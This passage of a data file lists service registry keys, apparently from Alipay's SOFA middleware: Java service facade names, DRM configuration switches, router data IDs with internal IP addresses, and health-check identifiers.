learingcenter.core.config.api.LocalCacheManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.feedback.ContentSecFeedBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.core.service.antha.AnthaViewDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.InterbankPaymentPeriodQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.country.AssetCountryCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.common.manage.cache.LocalCacheManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tis.service.CategoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableCheckBlockRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iotcubeGzoneTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cicada.common.service.facade.api.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secuinfos.common.service.facade.api.SecuIndividualInformationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitydatacore.common.service.facade.MobilePoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveSceneSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.tag.AlscTagCenterManageBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.signcenter.service.read.ProductSignDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.OpsOperationLogService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:codprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.FinfoTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CTUPOINT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bktranscore.common.service.facade.agreement.alipay.AlipayAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pfunddts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.recommend.AntdacCrowdRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscene.common.service.facade.api.PageDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finhinetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:lab-sofagwvpc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.revtrans:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdarttool.facade.message.MessageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.testPushExchangeStatusByBatchId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.taobao.aplatform.common.hsf.IActivityIepService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iprobe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.TableChainTaskCallBackManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitymarketscore.common.service.facade.api.MarketsAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icertifycore.service.facade.api.CertificationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.BikeRidingEnergyConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.140.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheClientSwitch.degradeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.createRuleJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ruleinference.DslManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.blessing.rpc.BlessingH5Rpc:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.CacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifeature.common.service.facade.FeatureTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.core.service.CrowdFundCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.biz.sign.facade.ClearSignHistoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundTempDataOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetswap.common.service.facade.api.PkgConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.SysConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.risktemplate.ScRiskTemplateHbaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:kingdom#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.beta.app.client.IUniqueIdService:xyz#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:qconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsdatahub.service.facade.dmc.TitanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbindustryomp.common.service.facade.spi.MerchantActionQueryCallback:1.0:kbservindustryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.client.CommonInstQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.page.PageMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cscheck.service.facade.api.GeneralQcDialogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EntRevPayInfoServiceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-8#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.excel.ExcelExportModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:mpafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.api.OneTimeAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MemberTemplateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.selectableFundProductCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcbumng_processCallback_antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:cinspfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.shiva.common.service.facade.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:pcmloanbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.31.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.drm.AdaRiskAppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:kgmngChangePlanCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.201.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductSeriesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerCertFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.pcardParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.PermlimitAvailableSwitchConfig.open,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_TAXI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.rate.triple.RatePublishTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.service.facade.api.PrizeRecommendReceiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertDetailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_NOTIFY_CENTER_SERVERLESS_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.TaskDeclarationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogActionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vouchercore:name=com.alipay.vouchercore.service.integration.drm.impl.VccSysParamDrmResource.groupNameMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.global.api.GlobalManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finfundmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointProdOpsResource.batchAgentDispatchControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insofflineinvest.common.service.facade.service.RegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxySignatureUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.bizprodmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lightmds.service.mds.MdsAdameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.biz.service.impl.message.handler.actionhandler.ActionHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.CommunicationConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomerweb.common.service.facade.UserAccessInfoManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.50.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@assetfluxdcsmirror#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.routeclient.interfacename:charthubtwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.sasTodaySavedAmountQueryProdTrans,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.hbase.FinTntComposeExchangeDepositbackHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:ereconDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ibmmdb.common.service.facade.FundRuleDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.asset.AssetOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:cashbook@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.channel.facade.DeductChannelRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.FundRedeemProportionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.price.ApportionPriceAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:sffgroup-flow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.orchestration.handler.RemoteActionHandler:1.0:sitebuilder-fr-assist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algo.common.service.facade.api.LoanStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.SmallGoalConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountDecisionApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountTransWithUniqueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mfinsnsprod:name=com.alipay.mfinsnsprod.drm.CommunityProdConfig4DRM3.goldProductIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frboss.facade.api.ChartTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.headercontent.api.HeaderContentOperatingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.manager.facade.ConsumeRecordDealRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.activity.ActivityEnrolmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.agency.AgencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.DeliverAddressService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.audio.TmallMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.fixedOrdersCntMaxConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.signArNotRetryErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditbenefit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.152.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.expire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finloancenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.150.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.msg.advert.LifeMsgForAdvertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-FCFRAMODEL-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dmsint@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:icontentcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kaleidoscopecenter.common.service.facade.SmartUIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchcommercelab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbarcenter.common.service.facade.price.AntPriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.5.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkpaycore.common.service.facade.QuickPayAccountBalanceCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.taskEnvSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.XflushErrorV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-satori@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_HSF_LOW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-gffund-service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kaleido.common.service.facade.copartner.CopartnerActTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.order.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.common.InvestSealSignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceGroupScopeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dctlib.sdk.protection.masking.MaskingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.neardata.senior.family.api.FamilyRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.loggerSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_CRM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:pointExpireTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.UserServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifincore.facade.operation.ChannelSwitchBizConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.api.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.integration.promokernel.CertificateOperateFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.loadDataTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.192.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@ccrprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.ebppprod.common.service.facade.topup.TopUpBillKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.file.service.facade.FinfundPayConfirmFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbill.common.service.facade.model.api.file.ManualBillFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_MOBILE_USER_WIDGET_MSG_EXPIRY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imasp.common.service.facade.BikeRidingRecordServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.aiAnswerFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.ArBillOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgcore.common.service.client.tr.EdgeTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_FINSCPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.biztest.cases.order.ToShopCase:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:filecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fporgassetprod-all#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.141.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_S_FINCOM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.alarmHandleSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditrecweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_commonSubmitScriptProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.asset.AssetExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sendDeletePreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.CacheDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_MOBILE_SECURE_CASE_MESSAGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.totalRound,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antrdservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:PromoPlatform_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alplatform.common.service.facade.api.ProcessCallBack:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.idm.IdmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@